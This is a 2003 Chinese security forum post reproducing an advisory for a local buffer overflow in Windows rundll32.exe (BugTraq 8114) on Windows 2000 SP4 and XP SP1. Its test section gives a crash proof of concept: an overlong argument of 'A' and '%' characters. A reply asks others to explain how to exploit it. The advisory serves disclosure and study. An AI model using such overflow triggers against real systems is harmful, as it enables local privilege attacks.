论坛: 菜鸟乐园 标题: 漏洞公告:Microsoftrundll32.exe本地缓冲区溢出漏洞 复制本贴地址    
作者: wj7017654 [wj7017654]    论坛用户   登录
发布日期:2003-07-06
更新日期:2003-07-11

受影响系统:
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1

发布日期:2003-07-06
更新日期:2003-07-11

受影响系统:
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 8114

Microsoft Windows是微软开发的视窗操作系统。

Microsoft Windows 包含的rundll32.exe对用户提交的参数缺少充分检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。

当超长字符串作为参数提交给rundll32.exe执行时,会发生溢出,可能以高权限在系统上执行任意指令。

<*来源:Rick Patel (rikul@bellsouth.net)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105770180515783&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Rick Patel (rikul@bellsouth.net)提供了如下测试方法:

rundll32.exe advpack32.dll,<'A'x499>

在采用SP4补丁的系统中,下面的方法可以导致溢出:

C:\WINNT\system32>rundll32.exe 
rundll32.exe,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% <-- crashes 0x00250025...

建议:
--------------------------------------------------------------------------------
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/




地主 发表时间: 07/19 18:54
回复: wj7017654 [wj7017654]   论坛用户   登录
知道利用方法的提携一下菜鸟怎么使用。

B1层 发表时间: 07/19 18:56

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号